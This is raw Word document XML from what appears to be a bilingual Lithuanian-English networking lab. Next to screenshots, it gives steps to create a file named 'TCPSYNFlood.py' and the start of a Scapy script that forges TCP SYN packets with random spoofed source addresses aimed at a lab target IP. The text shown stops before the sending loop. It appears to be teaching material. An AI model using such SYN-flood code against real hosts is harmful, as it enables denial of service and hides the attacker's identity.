    <w:p w14:paraId="54A87CDD" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001B33B6"/>
    <w:p w14:paraId="2A436954" w14:textId="1FE94FD6" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001B33B6">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:t xml:space="preserve">TCP is a reliable and secure transport protocol. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:t xml:space="preserve">UDP is faster, but less reliable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20875AC4" w14:textId="6246A4A6" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="00352171">
      <w:r w:rsidRPr="001B33B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B276DFD" wp14:editId="75E30474">
            <wp:extent cx="4315427" cy="971686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81350673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6736" name="Picture 1" descr="A computer screen shot of a computer code&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4315427" cy="971686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC3762" w14:textId="63ADE06B" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="00352171">
      <w:r w:rsidRPr="001B33B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E174A6F" wp14:editId="6EF5778F">
            <wp:extent cx="5612450" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="19754597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59747" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5624348" cy="2968555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E0EEA" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="00352171" w:rsidRDefault="001B33B6" w:rsidP="00352171"/>
    <w:p w14:paraId="3B16C9BD" w14:textId="40347D4F" w:rsidR="006A432C" w:rsidRDefault="001B33B6" w:rsidP="006A432C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38B813FF" wp14:editId="37FEF104">
            <wp:extent cx="6645910" cy="2198370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1490162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2997" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2198370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68427BAA" w14:textId="58DFA58B" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="006A432C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76654E78" w14:textId="561646F6" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="006A432C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sukuriate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>failą</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “touch TCPSYNFlood.py” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jį</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redaguojate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “nano TCPSYNFlood.py”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDA3E4" w14:textId="25B053BA" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC18455" w14:textId="0268D43C" w:rsidR="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214476C2" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFE88C5" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aukos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adresas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Port'as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Set your target IP and Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A8E30" w14:textId="638AFA08" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "10.0.2.5"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536D8BEC" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9DB753" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398EB5C8" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E09033" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Atsitiktinio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adreso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Porto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sugeneravimas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Generate random source IP address and Port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B3EB67" w14:textId="45953ACC" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="2592" w:firstLine="195"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>".".join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>map(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>str, (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>random.randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(0, 255) for _ in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4))))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>random.randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(1024, 65535)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5A8C3C" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C2AE03" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paketo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sukurimas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Create the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A527673" w14:textId="2A84C893" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sport=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, flags="S")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    packet = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1896DCFE" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8AD20" w14:textId="77777777" w:rsidR="001B33B6" w:rsidRPr="001B33B6" w:rsidRDefault="001B33B6" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paketo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
